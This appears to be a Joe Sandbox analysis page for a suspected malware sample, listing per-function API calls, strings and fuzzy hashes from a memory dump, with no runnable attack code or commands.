Function 00699F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0069903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00699F0C

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: c80ccab4922594ed2dc4a51782b15df76f8aeef3875838617a4ee2b3ba13139e
Instruction ID: 7a617515f3d6f0dc2e7f1d480b7a88b49c373b7e69bfb7f7e04dfe127924f1d0
Opcode Fuzzy Hash: c80ccab4922594ed2dc4a51782b15df76f8aeef3875838617a4ee2b3ba13139e
Instruction Fuzzy Hash: FAA0243004001D47CF001730CD0445C3711F7107C030051D45007CF071C7134407C700

Function 006AAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,006AAE72,C:\Users\user\Desktop,00000000,006D946A,00000006), ref: 006AAC08

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 55207e8d02538984eec5625eb1ee0218810925bce8b1ef0fafc8897a6643510f
Instruction ID: 8250d8f9270e2e8cae4224cbc0b37948035e286f89c19af51534285650829b8f
Opcode Fuzzy Hash: 55207e8d02538984eec5625eb1ee0218810925bce8b1ef0fafc8897a6643510f
Instruction Fuzzy Hash: F2A011302002008B83002B328F0AA0EBAAAAFA2B00F08C028A00080230CB30C820AA00

Function 00699620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,006995D6,?,?,?,?,?,006C2641,000000FF), ref: 0069963B

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8382fb7ae11c86fa75c968abf1cef4116a631839a16aff54ddab2e5643bd4e06
Instruction ID: 1c52bbf91e7ad7b7ebbbee55d45bf4c14abee258d532194d02f1d3edf2827318
Opcode Fuzzy Hash: 8382fb7ae11c86fa75c968abf1cef4116a631839a16aff54ddab2e5643bd4e06
Instruction Fuzzy Hash: CAF08971581B159FEF308A28C468BD277EE6B13325F045B1ED0E643EE0D761658DCA50

Non-executed Functions

Function 006AC220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00691316: GetDlgItem.USER32(00000000,00003021), ref: 0069135A
Part of subcall function 00691316: SetWindowTextW.USER32(00000000,006C35F4), ref: 00691370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 006AC2B1
EndDialog.USER32(?,00000006), ref: 006AC2C4
GetDlgItem.USER32(?,0000006C), ref: 006AC2E0
SetFocus.USER32(00000000), ref: 006AC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 006AC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 006AC358
FindFirstFileW.KERNEL32(?,?), ref: 006AC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006AC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 006AC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 006AC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 006AC3D4
_swprintf.LIBCMT ref: 006AC404

Part of subcall function 00694092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006940A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 006AC417
FindClose.KERNEL32(00000000), ref: 006AC41E
_swprintf.LIBCMT ref: 006AC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 006AC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 006AC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 006AC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 006AC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 006AC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 006AC509
_swprintf.LIBCMT ref: 006AC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 006AC548
_swprintf.LIBCMT ref: 006AC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 006AC5AF

Part of subcall function 006AAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 006AAF35
Part of subcall function 006AAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,006CE72C,?,?), ref: 006AAF84

Strings

%s %s, xrefs: 006AC469, 006AC58E
REPLACEFILEDLG, xrefs: 006AC247
%s %s %s, xrefs: 006AC3F2, 006AC527
Pj, xrefs: 006AC342

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$Pj$REPLACEFILEDLG
API String ID: 797121971-3858172111
Opcode ID: 3decf6180b88c7b1857f66ee2517fd81740534c2a2def7d3eb3d48f532986e60
Instruction ID: 9f042256f8a803efb14ea51b6e5fccd78c112ff78e14522efadd639e136d1169
Opcode Fuzzy Hash: 3decf6180b88c7b1857f66ee2517fd81740534c2a2def7d3eb3d48f532986e60
Instruction Fuzzy Hash: A1919672248344BFD721EBA0CC49FFB77EEEB4A710F044819F645D6181D775AA058B62

Function 00696FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00696FAA
_wcslen.LIBCMT ref: 00697013
_wcslen.LIBCMT ref: 00697084

Part of subcall function 00697A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00697AAB
Part of subcall function 00697A9C: GetLastError.KERNEL32 ref: 00697AF1
Part of subcall function 00697A9C: CloseHandle.KERNEL32(?), ref: 00697B00

Part of subcall function 0069A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0069977F,?,?,006995CF,?,?,?,?,?,006C2641,000000FF), ref: 0069A1F1
Part of subcall function 0069A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0069977F,?,?,006995CF,?,?,?,?,?,006C2641), ref: 0069A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00697139
CloseHandle.KERNEL32(00000000), ref: 00697155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00697298

Part of subcall function 00699DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,006973BC,?,?,?,00000000), ref: 00699DBC
Part of subcall function 00699DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00699E70

Part of subcall function 00699620: CloseHandle.KERNELBASE(000000FF,?,?,006995D6,?,?,?,?,?,006C2641,000000FF), ref: 0069963B

Part of subcall function 0069A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0069A325,?,?,?,0069A175,?,00000001,00000000,?,?), ref: 0069A501
Part of subcall function 0069A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0069A325,?,?,?,0069A175,?,00000001,00000000,?,?), ref: 0069A532

Strings

UNC\, xrefs: 00697051
SeCreateSymbolicLinkPrivilege, xrefs: 00696FCC
SeRestorePrivilege, xrefs: 00696FC2
\??\, xrefs: 0069702B

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 6cc02240f06c7d193ac836a4f9dfa014ac72ae332b16c5cf2457afdfcf19c769
Instruction ID: b5733eee77e49a90534f0d8c46dc79976f9291d9c4eee85f28e4ac662db3a1df
Opcode Fuzzy Hash: 6cc02240f06c7d193ac836a4f9dfa014ac72ae332b16c5cf2457afdfcf19c769
Instruction Fuzzy Hash: 1AC105B1A14204AADF20EB74CC41FFEB3AEAF05300F04455EF956E7682D734AA84CB65

Function 006BD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 006BDA34

Strings

1#IND, xrefs: 006BEC2C
1#INF, xrefs: 006BEC41
1#QNAN, xrefs: 006BEC3A
1#SNAN, xrefs: 006BEC33

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 8e692ba9c5b8ab2b24a6297bf73e50be4fdd6ddd75baadc2ce0d26df31362281
Instruction ID: c8d7fbb6f21431edf5bb0b9f3454d40d478901cd1639d992b1fe6c2b121f5d50
Opcode Fuzzy Hash: 8e692ba9c5b8ab2b24a6297bf73e50be4fdd6ddd75baadc2ce0d26df31362281
Instruction Fuzzy Hash: 94C24AB1E086288FDB65CE28DD407EAB7BAEB44305F1541EAD44DE7241E779AEC18F40

Function 006932F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00693300
_swprintf.LIBCMT ref: 006936C7

Strings

h%u, xrefs: 006936BC
hc%u, xrefs: 0069370A
CMT, xrefs: 00693A17

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 83542746df6877d56fe14c6e4a61634936364a48b44d3abe925f19a574879a23
Instruction ID: 199d4c5649733bda185567c87d7de9558ace783215dc6d603aba918cd2438595
Opcode Fuzzy Hash: 83542746df6877d56fe14c6e4a61634936364a48b44d3abe925f19a574879a23
Instruction Fuzzy Hash: 8C32F471514384AFDF54DF74C895AEA3BAAAF15300F08047DFD8A8B786DB709A49CB24

Function 0069286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00692874
_strlen.LIBCMT ref: 00692E3F

Part of subcall function 006A02BA: __EH_prolog.LIBCMT ref: 006A02BF

Part of subcall function 006A1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0069BAE9,00000000,?,?,?,000103E4), ref: 006A1BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00692F91

Strings

CMT, xrefs: 00692FBC

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 9506e49c7b3efe61e8084a167ed663efb703fe77980577ac24fa2079770c4f17
Instruction ID: 9c4ad5a0bad24451a2ce6ce14b0bf986656728579cc959eb1ba5229168e8769c
Opcode Fuzzy Hash: 9506e49c7b3efe61e8084a167ed663efb703fe77980577ac24fa2079770c4f17
Instruction Fuzzy Hash: F66247715002459FDF19DF38C8967EA3BAAEF54310F08447EEC9A8B782DB759949CB20

Function 006AF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006AF844
IsDebuggerPresent.KERNEL32 ref: 006AF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006AF930
UnhandledExceptionFilter.KERNEL32(?), ref: 006AF93A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 23b67d666e27e2d3c35bc8ad7fb26fb2c12ee24c80a0b25a207b0d222adae0c2
Instruction ID: 4c81977808bcef50609cbd0414b7c57610ba8999865451c2bc2bf35941b28570
Opcode Fuzzy Hash: 23b67d666e27e2d3c35bc8ad7fb26fb2c12ee24c80a0b25a207b0d222adae0c2
Instruction Fuzzy Hash: 50311675D052199FDB60EFA4D989BCDBBB8AF09304F1040AAE50DAB250EB719F848F45

Function 006AE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,006AE5E8,0000001C,006AE7DD,00000000,?,?,?,?,?,?,?,006AE5E8,00000004,006F1CEC,006AE86D), ref: 006AE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,006AE5E8,00000004,006F1CEC,006AE86D), ref: 006AE6CF

Strings

D, xrefs: 006AE6C3

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: e14d86e279d5f812fdd8e775d448736ad8fe8dfcb4052ea1927ebfedc4b1a4fa
Instruction ID: 2b8810086e027a8a21419315168b27ffabe9fce84a5ead9de2c4ab4a673f7d1b
Opcode Fuzzy Hash: e14d86e279d5f812fdd8e775d448736ad8fe8dfcb4052ea1927ebfedc4b1a4fa
Instruction Fuzzy Hash: 9901D4726001096BDB14EE29DC09AEE7BAAAFC5328F0CC120ED19DA350D635DD05CA80

Function 006B8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 006B8FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 006B8FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 006B8FCC

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2bc5da7bb5788fd44a197791cbbb06c89b56ddc18a026362f70cacdcdb1cab85
Instruction ID: 4327ff73af8f68f9eca6e463d50577a6c714ab3b914b04fd5b475abcff8799c1
Opcode Fuzzy Hash: 2bc5da7bb5788fd44a197791cbbb06c89b56ddc18a026362f70cacdcdb1cab85
Instruction Fuzzy Hash: EC31D574901228ABCB61EF64D888BDCBBB9AF08311F5041EAE41CA7250EB309F81CF55

Function 006BB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 006BB4DB

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: b6a9276ad762dcb0f5b6915966c7517439c8ffc7d346e73cb3435874b566453c
Instruction ID: 15dce80f4e297de47e2c5a375ebb311a9e39ba4161fc2298de4c2f3bd1daf077
Opcode Fuzzy Hash: b6a9276ad762dcb0f5b6915966c7517439c8ffc7d346e73cb3435874b566453c
Instruction Fuzzy Hash: 4D3108B19002496FCB249E78CC84DFB7BFEEB45304F0451ACE519D7252E7B09D858B50

Function 006BD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 75fb91c04d4d225e537d71d29244e488388872a6063267a39722ca0328d928e0
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: ED021DB1E002199BDF14CFA9C8806EDBBF2EF48314F158169D919EB384E731AD418B94

Function 006AAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 006AAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,006CE72C,?,?), ref: 006AAF84

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 865e58d23287461541a59e7cb8a780451751e8e046ddf946b7fcd10540e4aaf1
Instruction ID: 636a703e4bf6d47b572cc8c352a5e204a442cd48e3da97481400248fbabc5972
Opcode Fuzzy Hash: 865e58d23287461541a59e7cb8a780451751e8e046ddf946b7fcd10540e4aaf1
Instruction Fuzzy Hash: 3801713A140348AFD7109F64DC45FAB77BDEF49710F109422FA05D7250D3709914CBA5

Function 00696C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00696DDF,00000000,00000400), ref: 00696C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00696C95

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ab34d6be3974fe194853b9a49c41649b6b9f0351a8cdaf33a43f0b16dc003a9e
Instruction ID: 02e0697a7348fea56d4725d2fb517cbf6ec700285dee25022b6a7d85b6c46d31
Opcode Fuzzy Hash: ab34d6be3974fe194853b9a49c41649b6b9f0351a8cdaf33a43f0b16dc003a9e
Instruction Fuzzy Hash: 9ED0C932344310FFFF110F618D06F6A7B9EBF45B61F18D404B795E85E0CA749425A629

Function 006C19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,006C19EF,?,?,00000008,?,?,006C168F,00000000), ref: 006C1C21

Memory Dump Source

